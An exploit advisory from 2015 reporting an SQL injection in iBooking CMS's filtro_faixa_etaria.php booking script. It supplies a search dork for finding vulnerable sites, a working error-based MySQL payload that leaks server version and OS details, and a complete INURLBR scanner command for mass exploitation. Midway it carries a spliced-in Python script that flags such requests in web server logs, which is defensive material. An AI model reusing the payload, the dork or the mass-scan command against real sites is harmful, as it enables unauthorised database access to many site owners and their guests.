
iBooking CMS SQL Injection

Posted Sep 18, 2015
Authored by Cleiton Pinheiro

iBooking CMS suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | f940a1514994a822f9b19f66067c704407e5484e1dded2db9cec7600be48e779

*# VENDOR:*             www.ibooking.com.br
*# Vulnerable versions:* ALL
*# File: * filtro_faixa_etaria.php
*# Parameter: * idPousada(GET)
*# DORK: * intext:"Desenvolvido por ibooking"
*# Reported:* 15/10/2015
#
---------------------------------------------------------------------------------
# AUTHOR: Cleiton Pinheiro / Nick: googleINURL
# EMAIL: inurlbr@gmail.com
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
#
---------------------------------------------------------------------------------

*# Description*
The vulnerable request is made through a JavaScript function found within
/motor-de-reservas.


# JavaScript code responsible for the vulnerable request

$.ajax({
    type: "GET",
    url: "filtro_faixa_etaria.php",
    data: "qtde_quartos=1&idPousada=61",
    success: function(xml){
        $("#filtro_faixa_etaria").html(xml);
    }
});


*# Vulnerable URL:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61

*# POC:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION)

*# Example:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)

*# Return print:*
http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png
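
For defenders, the request shape above stands out in web server logs: idPousada is a numeric ID in legitimate traffic, and the validation marker travels as a MySQL hex literal. The following Python check is an added example, not part of the original advisory or of the INURLBR tool; the combined log format, the constructed sample lines and the treatment of qtde_quartos as a plain integer are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (combined log format, documentation IPs); not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Sep/2015:18:40:01 -0300] "GET /motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61 HTTP/1.1" 200 512',
    '203.0.113.9 - - [15/Sep/2015:18:42:51 -0300] "GET /motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) HTTP/1.1" 200 731',
    '198.51.100.7 - - [15/Sep/2015:18:43:10 -0300] "GET /motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=2&idPousada=61%27 HTTP/1.1" 500 0',
    '198.51.100.7 - - [15/Sep/2015:18:43:12 -0300] "GET /index.php?id=1 HTTP/1.1" 200 1024',
]

ENDPOINT = "filtro_faixa_etaria.php"
INT_PARAMS = ("idPousada", "qtde_quartos")  # assumption: both are plain integers
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
HEX_RE = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")
SQL_HINTS = ("information_schema", "floor(rand(", "concat(", "select")

def decode_hex_literals(value):
    """Decode MySQL 0x... literals so hex-encoded markers become readable."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_RE.findall(value)]

def inspect_line(line):
    """Return a finding for a suspicious request to the endpoint, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/" + ENDPOINT):
        return None
    reasons = []
    params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
    for name in INT_PARAMS:
        for value in params.get(name, []):
            if not re.fullmatch(r"\d{1,10}", value):
                reasons.append(f"{name} is not an integer")
            reasons += [f"{name} contains {h}" for h in SQL_HINTS if h in value.lower()]
            reasons += [f"{name} hex literal decodes to {t!r}"
                        for t in decode_hex_literals(value)]
    return {"client": line.split()[0], "reasons": reasons} if reasons else None

def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [finding for finding in map(inspect_line, lines) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["client"], "; ".join(finding["reasons"]))
```

The integer check is the reliable signal; the keyword and hex-literal reasons only add context for triage.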


*# Mass exploitation using the INURLBR scanner*
# Download: https://github.com/googleinurl/SCANNER-INURLBR

*# COMMAND*
*# SETTING SEARCH DORK:*
--dork 'YOUR_DORK'
*# USE* --dork 'intext:"Desenvolvido por ibooking"'

*# SETTING OUTPUT FILE:*
*# USE* -s 'ibooking.txt'

*# SETTING STRING EXPLOIT GET:*
--exploit-get 'EXPLOIT_GET'
*# USE* --exploit-get
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'

*# SETTING TYPE OF VALIDATION: *
*# USE* -t 3
The third type combines the first and second types, so it also
establishes a connection with the exploit through the GET method.
The string set in the --exploit-get parameter is injected directly into
the URL:
Example: --exploit-get '/index.php?id=1&file=conect.php'
URL injection: http://www.target.br/index.php?id=1&file=conect.php

*# SETTING STRING OF VALIDATION:*
Specify the string to be used for validation:
Example: -a {string}
Using: -a '<title>hello world</title>'
If the specified value is found in the target, it is considered vulnerable.
- USE: -a 'INURLBR_VULN'
The INURLBR_VULN value is passed in hexadecimal format in the exploit-get
string.

*# FULL COMMAND:*
php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s
'ibooking.txt' --exploit-get
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'
-t 3 -a 'INURLBR_VULN'

*# MORE INFORMATION:*
http://blog.inurl.com.br/2015/09/0day-ibooking-cms-injecao-de-sql-e.html



+--------------------------------------------------------------------------------------+
|                                     G R 3 3 T S                                      |
+--------------------------------------------------------------------------------------+
* r00t-3xp10t, Jh00n, chk_, Unknownantisec, sl4y3r 0wn3r, hc0d3r,
arplhmd, 0x4h4x
* Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra,
Eclipse, shaxer
* dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão,
IceKiller, c00z
* Oystex, rH, Warflop, se4b3ar , Pablo Verlly Moreira